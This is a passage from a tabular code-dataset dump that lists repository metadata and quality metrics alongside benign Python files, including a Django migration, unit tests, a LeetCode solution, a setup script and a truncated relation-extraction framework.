hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f1c021de79d124febfa8a831e976cd4dc12aeed9
| 1,647
|
py
|
Python
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 21
|
2020-08-19T02:52:16.000Z
|
2022-02-25T12:35:04.000Z
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 3
|
2020-10-16T07:11:25.000Z
|
2021-06-30T10:26:04.000Z
|
src/compute_trust_values.py
|
johndpope/FacialRetargeting
|
5fb0c1da6af6c3d59aef264f567bfa7a244d0764
|
[
"MIT"
] | 7
|
2020-08-24T08:30:53.000Z
|
2022-03-28T15:55:24.000Z
|
import numpy as np
from src.compute_corr_coef import compute_corr_coef
from utils.plotting import plot_similarities
def compute_trust_values(dsk, do_plot=False):
"""
Compute trust values following formula 6
k:= number of blendshapes
n:= num_features (num_markers*3)
:param dsk: delta_sk vector (k, n)
:param do_plot: decide if we want to plot the between-correlation matrix
:return: trust values vector (k,)
"""
if len(np.shape(dsk)) != 2:
raise ValueError("[COMPUTE TRUST VALUE] dsk dimensions not supported ({}) instead of 2".format(len(np.shape(dsk))))
# compute between-blendshape correlation
ckl = compute_corr_coef(dsk, dsk)
ckl = np.maximum(ckl, np.zeros(np.shape(ckl)))
if do_plot:
plot_similarities(ckl, "Between blendshapes correlation", vmin=0, vmax=1)
# compute lower triangle
num_k = np.shape(ckl)[0]
low_trig = np.zeros(num_k)
for k in range(num_k):
val = 0
for l in range(k):
val += ckl[k, l]
low_trig[k] = val
max_low_trig = np.max(low_trig)
# compute trust values (formula 6)
tk = np.zeros(num_k)
for k in range(len(tk)):
tk[k] = 1 - low_trig[k]/max_low_trig
return tk
if __name__ == '__main__':
"""
test compute_trust_values function
run: python -m src.compute_trust_values
"""
np.random.seed(0)
from utils.re_order_delta import re_order_delta
# test compute trust values
sk = np.random.rand(6, 3) # (k, n)
sorted_sk = re_order_delta(sk)
tk = compute_trust_values(sorted_sk, do_plot=False)
print("tk")
print(tk)
| 26.564516
| 123
| 0.651488
| 252
| 1,647
| 4.055556
| 0.353175
| 0.093933
| 0.123288
| 0.02544
| 0.043053
| 0.043053
| 0.043053
| 0.043053
| 0
| 0
| 0
| 0.010383
| 0.23983
| 1,647
| 61
| 124
| 27
| 0.805911
| 0.226472
| 0
| 0
| 0
| 0
| 0.096035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.133333
| 0
| 0.2
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c16c5d4d00c03eee3d9db1e1fe2c9c3aca5189
| 2,042
|
py
|
Python
|
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | 8
|
2021-02-19T23:25:28.000Z
|
2021-09-24T20:11:13.000Z
|
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | null | null | null |
test/core/test_constant.py
|
haikusw/jaqalpaq
|
d507e894cb897756a1e51c99582b736254995b4e
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from jaqalpaq.core.parameter import ParamType
from jaqalpaq.core.constant import Constant
from . import randomize
from . import common
class ConstantTester(unittest.TestCase):
def test_valid_types(self):
"""Test that a Constant can only be created from valid types."""
valid_values = [
(randomize.random_float(), ParamType.FLOAT),
(randomize.random_integer(), ParamType.INT),
]
for value, kind in valid_values:
const, name, _ = common.make_random_constant(
value=value, return_params=True
)
self.assertEqual(kind, const.kind)
self.assertEqual(name, const.name)
# Note that we can also create a Constant from another Constant, but Jaqal
# currently cannot make use of this functionality.
reg = common.make_random_register()
qubit = common.choose_random_qubit_getitem(reg)
invalid_values = [None, reg, qubit]
for value in invalid_values:
with self.assertRaises(Exception):
Constant(randomize.random_identifier(), value)
def test_value(self):
"""Test that a constant yields the same value it was created with."""
const, _, value = common.make_random_constant(return_params=True)
common.assert_values_same(self, value, const.value)
def test_resolve_value(self):
"""Test that constants ignore the context given in resolve_value and
return their stored value."""
const = common.make_random_constant()
other_const = common.make_random_constant()
context = {const.name: other_const.value}
exp_value = const.value
act_value = const.resolve_value(context)
common.assert_values_same(self, exp_value, act_value)
def test_classical(self):
"""Test that all constants are appropriately labeled as classical."""
self.assertTrue(common.make_random_constant().classical)
if __name__ == "__main__":
unittest.main()
| 37.127273
| 82
| 0.669931
| 244
| 2,042
| 5.393443
| 0.368852
| 0.045593
| 0.072948
| 0.091185
| 0.115502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.246327
| 2,042
| 54
| 83
| 37.814815
| 0.855101
| 0.196866
| 0
| 0
| 0
| 0
| 0.004969
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.108108
| false
| 0
| 0.135135
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c26fda7f69a42db47f3f5783c055c679831e9b
| 8,035
|
py
|
Python
|
src/richard/videos/migrations/0001_initial.py
|
pyvideo/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 51
|
2015-01-24T07:53:56.000Z
|
2020-08-30T12:19:39.000Z
|
src/richard/videos/migrations/0001_initial.py
|
westurner/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 34
|
2015-02-23T11:15:00.000Z
|
2016-01-04T11:25:42.000Z
|
src/richard/videos/migrations/0001_initial.py
|
westurner/richard
|
894f5380e07d7e66453fe730891a21aca32d8edb
|
[
"Apache-2.0"
] | 16
|
2015-03-20T17:36:09.000Z
|
2022-01-07T01:04:17.000Z
|
# -*- coding: utf-8 -*-
# richard -- video index system
# Copyright (C) 2012, 2013, 2014, 2015 richard contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(help_text='The complete title for the category. e.g. PyCon 2010', max_length=255)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('url', models.URLField(default='', help_text='URL for the category. e.g. If this category was a conference, this would be the url for the conference web-site.', blank=True)),
('start_date', models.DateField(help_text='If the category was an event, then this is the start date for the event.', null=True, blank=True)),
('whiteboard', models.CharField(default='', help_text='Editor notes for this category.', max_length=255, blank=True)),
('slug', models.SlugField(unique=True)),
('added', models.DateTimeField(auto_now_add=True, null=True)),
],
options={
'ordering': ['title'],
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('iso639_1', models.CharField(max_length=3)),
('name', models.CharField(max_length=20)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RelatedUrl',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.URLField(max_length=255)),
('description', models.CharField(default='', max_length=255, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Speaker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
'verbose_name': 'speaker',
'verbose_name_plural': 'speakers',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('tag', models.CharField(max_length=30)),
],
options={
'ordering': ['tag'],
'verbose_name': 'tag',
'verbose_name_plural': 'tags',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('state', models.IntegerField(default=2, choices=[(1, 'Live'), (2, 'Draft')])),
('title', models.CharField(max_length=255)),
('summary', models.TextField(default='', help_text='Use Markdown', blank=True)),
('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
('quality_notes', models.TextField(default='', blank=True)),
('copyright_text', models.TextField(blank=True)),
('embed', models.TextField(blank=True)),
('thumbnail_url', models.URLField(max_length=255, null=True, blank=True)),
('duration', models.IntegerField(help_text=b'In seconds', null=True, blank=True)),
('video_ogv_length', models.IntegerField(null=True, blank=True)),
('video_ogv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_ogv_download_only', models.BooleanField(default=False)),
('video_mp4_length', models.IntegerField(null=True, blank=True)),
('video_mp4_url', models.URLField(max_length=255, null=True, blank=True)),
('video_mp4_download_only', models.BooleanField(default=False)),
('video_webm_length', models.IntegerField(null=True, blank=True)),
('video_webm_url', models.URLField(max_length=255, null=True, blank=True)),
('video_webm_download_only', models.BooleanField(default=False)),
('video_flv_length', models.IntegerField(null=True, blank=True)),
('video_flv_url', models.URLField(max_length=255, null=True, blank=True)),
('video_flv_download_only', models.BooleanField(default=False)),
('source_url', models.URLField(max_length=255, null=True, blank=True)),
('whiteboard', models.CharField(default='', max_length=255, blank=True)),
('recorded', models.DateField(null=True, blank=True)),
('added', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('slug', models.SlugField(unique=True)),
('category', models.ForeignKey(related_name='videos', to='videos.Category')),
('language', models.ForeignKey(to='videos.Language', null=True)),
('speakers', models.ManyToManyField(related_name='videos', to='videos.Speaker', blank=True)),
('tags', models.ManyToManyField(related_name='videos', to='videos.Tag', blank=True)),
],
options={
'ordering': ['-recorded', 'title'],
'get_latest_by': 'recorded',
'verbose_name': 'video',
'verbose_name_plural': 'videos',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='VideoUrlStatus',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('check_date', models.DateTimeField()),
('status_code', models.IntegerField()),
('status_message', models.CharField(max_length=255, blank=True)),
('url', models.URLField(max_length=255)),
('video', models.ForeignKey(to='videos.Video')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='relatedurl',
name='video',
field=models.ForeignKey(related_name='related_urls', to='videos.Video'),
preserve_default=True,
),
]
| 49.598765
| 191
| 0.571873
| 827
| 8,035
| 5.417171
| 0.247884
| 0.052232
| 0.040179
| 0.04933
| 0.566518
| 0.500893
| 0.422545
| 0.320089
| 0.227902
| 0.216741
| 0
| 0.014311
| 0.28687
| 8,035
| 161
| 192
| 49.906832
| 0.767539
| 0.093964
| 0
| 0.410072
| 0
| 0.007194
| 0.17541
| 0.012805
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014388
| 0
| 0.035971
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c41c955777189a3b733180afda82b9ed458a7c
| 1,399
|
py
|
Python
|
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/descwl_shear_sims
|
1c696518104b7f301dd6c69571239431c6232110
|
[
"BSD-3-Clause"
] | null | null | null |
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/descwl_shear_sims
|
1c696518104b7f301dd6c69571239431c6232110
|
[
"BSD-3-Clause"
] | 11
|
2019-12-10T23:30:27.000Z
|
2019-12-24T13:59:32.000Z
|
descwl_shear_sims/tests/test_artifacts.py
|
LSSTDESC/wl-shear-testing-sims
|
6e4a0baa6f664b5bc52b08b55614eaa58c8b0748
|
[
"BSD-3-Clause"
] | null | null | null |
"""
copy-paste from my (beckermr) personal code here
https://github.com/beckermr/metadetect-coadding-sims
"""
import numpy as np
import galsim
from descwl_shear_sims.masking import get_bmask_and_set_image
from descwl_shear_sims.artifacts import (
generate_bad_columns,
generate_cosmic_rays,
)
def test_basic_mask():
image = galsim.ImageD(np.zeros((100, 100)))
bmask = get_bmask_and_set_image(
image=image, rng=None, cosmic_rays=False, bad_columns=False,
)
assert np.all(bmask.array == 0)
def test_generate_cosmic_rays_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_cosmic_rays_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_cosmic_rays(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
def test_generate_bad_columns_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_bad_columns_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_bad_columns(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
| 25.436364
| 68
| 0.719085
| 211
| 1,399
| 4.530806
| 0.279621
| 0.050209
| 0.112971
| 0.138075
| 0.65272
| 0.539749
| 0.539749
| 0.539749
| 0.518828
| 0.351464
| 0
| 0.043404
| 0.160114
| 1,399
| 54
| 69
| 25.907407
| 0.770213
| 0.072194
| 0
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 1
| 0.151515
| false
| 0
| 0.121212
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c47788397390c41f153d775e370f60b472f99d
| 628
|
py
|
Python
|
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | null | null | null |
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | null | null | null |
leetcode_submissions/7.reverse-integer.18198620.ac.py
|
aenon/online_judge
|
bff3991519cd4f2d80dea9b17680dbc5d4c44b9b
|
[
"MIT"
] | 1
|
2015-01-10T16:02:43.000Z
|
2015-01-10T16:02:43.000Z
|
#!/usr/bin/env python
# Reverse Integer https://oj.leetcode.com/problems/reverse-integer/
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
#Math
# Xilin SUN
# Dec 7 2014
class Solution:
# @return an integer
def reverse(self, x):
if x > 2147483646:
return 0
if x < -2147483647:
return 0
isPositive = True
if x < 0:
isPositive = False
x = -x
rev = 0
while x != 0:
rev = 10 * rev + x % 10
x = x / 10
if rev > 2147483646:
return 0
if rev < -2147483647:
return 0
if isPositive:
return rev
return -rev
| 19.030303
| 68
| 0.593949
| 91
| 628
| 4.098901
| 0.43956
| 0.075067
| 0.072386
| 0.069705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164384
| 0.302548
| 628
| 33
| 69
| 19.030303
| 0.687215
| 0.353503
| 0
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c529b5976d0a2cdf007169fc8e0ee8525206e1
| 1,400
|
py
|
Python
|
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | 1
|
2021-01-08T15:34:08.000Z
|
2021-01-08T15:34:08.000Z
|
src/z3c/configurator/tests.py
|
zopefoundation/z3c.configurator
|
390416d2fa61ddf97c28e6af32eae3660bb725e2
|
[
"ZPL-2.1"
] | 1
|
2015-04-03T05:49:32.000Z
|
2015-04-03T05:49:32.000Z
|
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
#############################################################################
"""Configurator Test Setup"""
import re
import doctest
from zope.component import testing
from zope.testing.renormalizing import RENormalizing
def setUp(test):
testing.setUp(test)
def tearDown(test):
testing.tearDown()
def test_suite():
checker = RENormalizing((
(re.compile("u'(.*?)'"), "'\\1'"),
(re.compile("<type 'unicode'>"), "<class 'str'>"),
(re.compile("zope.schema._bootstrapinterfaces.RequiredMissing"),
"RequiredMissing"),
(re.compile("zope.schema._bootstrapinterfaces.WrongType"),
"WrongType"),
))
return doctest.DocFileSuite(
'README.txt',
setUp=setUp, tearDown=tearDown, checker=checker,
optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
| 31.818182
| 78
| 0.620714
| 145
| 1,400
| 5.965517
| 0.565517
| 0.041619
| 0.03237
| 0.043931
| 0.087861
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005988
| 0.165
| 1,400
| 43
| 79
| 32.55814
| 0.733961
| 0.342857
| 0
| 0
| 0
| 0
| 0.221629
| 0.12016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.190476
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c6b2f9d9acd98dcef1131f691572e33395120a
| 528
|
py
|
Python
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | 2
|
2020-02-18T18:10:50.000Z
|
2020-08-04T21:00:29.000Z
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | 4
|
2020-02-19T10:46:02.000Z
|
2021-01-09T18:52:45.000Z
|
time_to_speech.py
|
besi/stereopi
|
c03a1ae990af67dde4e2cd832a20b49d697de230
|
[
"MIT"
] | null | null | null |
# Credits go to <http://codereview.stackexchange.com/q/37522>
import random
import time
def current_time():
'''Returns a tuple containing (hour, minute) for current local time.'''
local_time = time.localtime(time.time())
return (local_time.tm_hour, local_time.tm_min)
(hour, minute) = current_time()
def ishtime(hours, minutes):
hours = hours % 24
if minutes == 0:
return(str(hours) + ' sharp')
return(str(hours) + ' . . . and ' + str(minutes) + ' minutes')
print(ishtime(hour, minute))
| 22
| 75
| 0.657197
| 70
| 528
| 4.857143
| 0.514286
| 0.105882
| 0.064706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018824
| 0.195076
| 528
| 23
| 76
| 22.956522
| 0.781176
| 0.238636
| 0
| 0
| 0
| 0
| 0.063131
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.416667
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c6e01e5913573733f519b9c5d164e6fed7195b
| 575
|
py
|
Python
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | 2
|
2017-04-03T13:59:00.000Z
|
2017-04-06T04:57:50.000Z
|
setup.py
|
ckuzma/solar-viability-tester
|
c34d03d1914374279ca269ab402eb5074f7555a6
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='solar-viability-tester',
version='1.0.0',
description='Solar viability tester utilizing the AT&T IoT Starter Kit and PubNub.',
long_description=long_description,
url='https://github.com/ckuzma/solar-viability-tester',
license='Apache-2.0'
)
| 30.263158
| 89
| 0.707826
| 82
| 575
| 4.865854
| 0.621951
| 0.150376
| 0.150376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012658
| 0.175652
| 575
| 18
| 90
| 31.944444
| 0.829114
| 0.078261
| 0
| 0
| 0
| 0
| 0.329412
| 0.043137
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c78560c5fc55f8dc09c8791ab3fa9dcc1ccd67
| 31,028
|
py
|
Python
|
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
framework/framework.py
|
wbqhb/SEPC
|
1a5e03b70984b759b615424dc06f530d5de00f51
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2021/5/4 下午3:05
# @Author : godwaitup
# @FileName: framework.py
# original framework for joint extraction.
import torch.optim as optim
from torch import nn
import os
import data_loader
import torch.nn.functional as F
import numpy as np
import json
from functools import partial
from data_loader import cmed_collate_fn
import torch
def _to_sub(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[0].split(" ")[0])
else:
ret.add(triple[0])
return ret
def _to_obj(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
ret.add(triple[2].split(" ")[0])
else:
ret.add(triple[2])
return ret
def _to_ep(triple_list, head_only=False, lang='ENGLISH'):
